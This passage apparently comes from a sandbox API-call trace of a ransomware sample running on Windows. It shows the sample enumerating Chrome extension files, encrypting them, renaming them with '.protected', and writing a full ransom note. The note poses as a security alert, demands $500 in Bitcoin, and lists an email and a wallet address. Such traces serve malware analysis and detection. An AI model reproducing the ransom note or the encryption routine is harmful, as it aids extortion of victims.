(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.636] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.636] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.636] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.636] CloseHandle (hObject=0x164) returned 1 [0079.636] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.636] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.636] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW") returned 145 [0079.636] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.636] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.636] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*") returned 147 [0079.636] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.636] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\.") returned 147 [0079.637] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\..") returned 148 [0079.637] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.637] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.637] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.637] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.637] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.637] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.637] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.637] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.637] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.638] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json") returned 159 [0079.638] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.638] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10b, lpOverlapped=0x0) returned 1 [0079.638] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10b, lpOverlapped=0x0) returned 1 [0079.639] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.639] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.639] CloseHandle (hObject=0x168) returned 1 [0079.639] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.protected") returned 169 [0079.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.640] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.640] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.640] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 163 [0079.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.640] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.640] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.641] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.641] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.641] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.641] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.641] CloseHandle (hObject=0x164) returned 1 [0079.641] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0079.641] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0079.641] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\RESTORE_FILES.txt") returned 157 [0079.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.645] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.645] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0079.646] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.646] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0079.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.646] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0079.646] CloseHandle (hObject=0x160) returned 1 [0079.646] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Windows") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Program Files") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="Program Files (x86)") returned -1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="$Recycle.bin") returned 1 [0079.646] lstrcmpiW (lpString1="_metadata", lpString2="System Volume Information") returned -1 [0079.646] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata") returned 140 [0079.646] lstrcmpW (lpString1="_metadata", lpString2=".") returned 1 [0079.646] lstrcmpW (lpString1="_metadata", lpString2="..") returned 1 [0079.646] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*") returned 142 [0079.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\.") returned 142 [0079.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.647] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.647] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\..") returned 143 [0079.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.647] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0079.647] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0079.647] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.647] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0079.647] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0079.647] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0079.647] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0079.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0079.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0079.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_metadata\\verified_contents.json") returned 163 [0079.648] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0079.648] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.660] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0079.660] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0079.660] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 